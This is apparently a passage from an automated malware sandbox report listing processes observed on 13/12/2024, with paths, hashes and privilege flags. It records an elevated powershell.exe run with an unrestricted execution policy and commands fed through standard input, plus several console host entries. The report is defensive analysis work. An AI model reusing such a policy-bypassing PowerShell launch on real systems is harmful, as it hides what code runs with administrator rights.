                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:59
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:60
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:61
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:62
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Disassembly

                                                                                                                                                                      No disassembly